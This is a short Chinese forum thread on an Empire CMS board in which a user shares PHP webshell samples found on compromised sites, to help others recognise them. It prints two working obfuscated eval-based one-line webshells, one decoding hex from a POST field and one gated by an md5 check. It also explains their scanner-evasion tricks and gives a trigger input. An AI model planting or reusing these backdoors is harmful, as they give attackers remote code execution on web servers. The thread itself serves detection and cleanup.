php木马的识别帝国cms - 安全、强大、稳定、灵活

帝国论坛 → 帝国网站管理系统交流区 → 模板/标签/插件共享交流 → php木马的识别

【本版专题贴子】

jiuhecai
用户头衔：探花

精华贴   ：0
发贴数   ：3023
经验值   ：8618
注册时间：2014-07-02

信息

搜索

好友

发送悄悄话

【精益求精－帝国网站管理系统7.5正式版开源发布】 [第 1 楼]

php木马的识别

多次遭遇，多次帮朋友查收。收集下来，供大家识别预防。

帝国插件插件定制。帝国临时工。查杀顽固木马。专业解决难题。qq--110102296

2021-10-13 21:24:46

已设置保密

顶部

引用

报告

编辑

删除

jiuhecai
用户头衔：探花

精华贴   ：0
发贴数   ：3023
经验值   ：8618
注册时间：2014-07-02

信息

搜索

好友

发送悄悄话

【免费开源－EBMA系统：更安全的MYSQL管理和备份系统】 [第 2 楼]

class _{
      static public $phpcms=Null;
      function __construct($l="error"){
self::$phpcms=$l;
@eval/*Defining error level offences*/(null.null.self::$phpcms);
}}
      function hexToStr($hex){
      $str="";
      for($i=0;$i<strlen($hex)-1;$i+=2)
      $str.=chr(hexdec($hex[$i].$hex[$i+1]));
      return  $str;
}
$error = null.hexToStr(@$_POST/*\*/["123"]);
$d = new _($error);

帝国插件插件定制。帝国临时工。查杀顽固木马。专业解决难题。qq--110102296

2021-10-13 21:26:59

已设置保密

顶部

引用

报告

编辑

删除

bj114
用户头衔：探花

精华贴   ：0
发贴数   ：2807
经验值   ：7816
注册时间：2012-04-09

信息

搜索

好友

发送悄悄话

【精益求精－帝国网站管理系统7.5正式版开源发布】 [第 3 楼]

哦哦

2021-10-13 21:43:30

已设置保密

顶部

引用

报告

编辑

删除

jiuhecai
用户头衔：探花

精华贴   ：0
发贴数   ：3023
经验值   ：8618
注册时间：2014-07-02

信息

搜索

好友

发送悄悄话

【免费开源－EBMA系统：更安全的MYSQL管理和备份系统】 [第 4 楼]

这个木马是一句话木马 <?php eval($_POST['123']);?> 的变种。

1. 木马中定义的函数 hexToStr  等同于 php内置的函数pack("H*",$str),重新定义的目的，是避开对敏感函数pack的扫描

2.  类中包含了敏感函数eval

3.  比如让post['123']='706870696e666f28293b';  相当于执行 phpinfo();

帝国插件插件定制。帝国临时工。查杀顽固木马。专业解决难题。qq--110102296

2021-10-13 21:53:21

已设置保密

顶部

引用

报告

编辑

删除

jiuhecai
用户头衔：探花

精华贴   ：0
发贴数   ：3023
经验值   ：8618
注册时间：2014-07-02

信息

搜索

好友

发送悄悄话

【精益求精－帝国网站管理系统7.5正式版开源发布】 [第 5 楼]

下面这个依然是一句话的变种：

<script language='php'>if(md5($_GET['cmd'])=='50247d92877126ad5eccd526d1926521'){@eval($safe="$_POST[helensb]");}</script>

他采用了php代码的不常用标记<script language='php'>。

帝国插件插件定制。帝国临时工。查杀顽固木马。专业解决难题。qq--110102296

2021-10-14 07:48:48

已设置保密

顶部

引用

报告

编辑

删除